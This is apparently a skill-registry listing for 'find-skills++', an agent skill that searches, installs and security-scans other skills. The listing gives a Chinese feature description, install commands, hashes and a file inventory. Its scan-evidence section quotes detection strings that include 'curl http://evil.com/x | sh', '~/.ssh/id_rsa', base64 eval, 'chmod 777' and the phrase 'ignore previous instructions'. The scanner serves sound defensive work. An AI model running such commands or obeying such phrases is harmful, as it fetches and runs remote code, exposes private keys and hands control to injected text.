.claude/skills/find-skills++1 structural issue
- error: name must contain lowercase ASCII letters, numbers and single hyphens only.
SKILL.md
Runtime, accounts, dependencies, permissions, network behavior and task quality remain untested.
技能生态的「安全策展 → 安装闸门 → 生态治理」全能工具,find-skills 的社区超级增强版(能力已超越原版与 skill-vetter 等同类)。 当用户用自然语言描述需求("我想做个海报""帮我分析股票""有没有能做 X 的技能"),或明确说 "找个 skill / 找技能 / 安装技能 / find skills / 技能推荐 / 技能管理 / 卸载技能 / 技能安全审查 / 技能装太多太乱了"时触发。 原版与同类均不具备的差异化:① 安装前 AST 级安全扫描(ast+shlex,四级风险 EXTREME/HIGH/MEDIUM/LOW + 文件·网络·命令权限清单,EXTREME 直接阻断,能识破动态拼接、base64 混淆执行、凭据目录窃取、Agent 身份文件读取); ② sync 在线目录同步支撑的真·离线全能(离线仍可搜上百个技能,不依赖实时 API); ③ 环境感知引用校验(识破"长得好看但引用了不存在工具"的假优技能); ④ 技能质量评级 0-100(七维);⑤ 跨源合并去重 + 来源信誉门槛; ⑥ 全生命周期 update / uninstall / clean-dupes(进回收站可还原,…
These states come from the source or distribution context. None of the entries below are SkillVetAI compatibility test results.
These checks parse the fixed package against dated platform rules. They do not execute the Skill or verify task behavior.
.claude/skills/find-skills++SKILL.mdRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
.agents/skills/find-skills++SKILL.mdRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
skills/find-skills++SKILL.mdRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
This command is recorded from the source ecosystem and resolves the registry's latest release. The fixed release shown on this page should be inspected before adoption.
clawhub install @cdhewei/find-skills-plusplusclawhub inspect @cdhewei/find-skills-plusplus --version 5.3.1This automated, non-executing scan is bound to this release hash. It is not a safety certification and may contain false positives or false negatives.
curl|shcurl管道sh": "curl http://x.com/a.sh | shcurl|shcurl http://1.2.3.4/x | shcurl http://evil.com/x | shcurl|shcurl\|shcurl\|sh~/.ssh/id_rsa~/.ssh/id_rsa~/.ssh/id_rsa~/.ssh/id_rsa~/.ssh/id_rsa~/.ssh/id_rsaos.system(eval(exec(eval(base64base64base64ignore previous instructionschmod 777chmod 777chmod 777chmod 777chmod 777chmod 777This is registry-supplied evidence for the recorded release, not an independent SkillVetAI scan. Check the canonical source for the full report, scanner versions, scope, and current moderation state.
The catalog stores hashes and an inventory summary for change detection. It does not republish the package contents.
sha256:f362c28b759808af27befac70c4864f01101e777d27eb9614ce4c4c20f1fa2c6CHANGELOG.mdconftest.pyCONTRIBUTING.mdfindskills.pyLICENSEmarket-card.mdMARKETPLACE-LISTING.mdNOTICEREADME.mdreferences/cli.mdreferences/enhancements.mdreferences/ranking.mdreferences/roadmap.mdreferences/security.mdregistry.jsonscripts/security_scan.pyscripts/smoke.pyskill-card.mdSKILL.mdtests/conftest.pytests/test_ast_scan.pytests/test_cli_phase2.pytests/test_cli.pytests/test_credential_escalation.pytests/test_discover.pytests/test_doctor.pytests/test_lifecycle.pytests/test_outdated.pytests/test_permissions.pytests/test_promote.pyrelease via releaser
Both fixed releases were scanned under the current scanner and policy, so finding, permission and dependency changes are available.
These older immutable releases were observed by prior successful syncs. They remain recorded when a newer release becomes current.
sha256:b2dde26000b1b69dcc99ddcc60b054354d936ee2213a89758a24cd12a1d85fef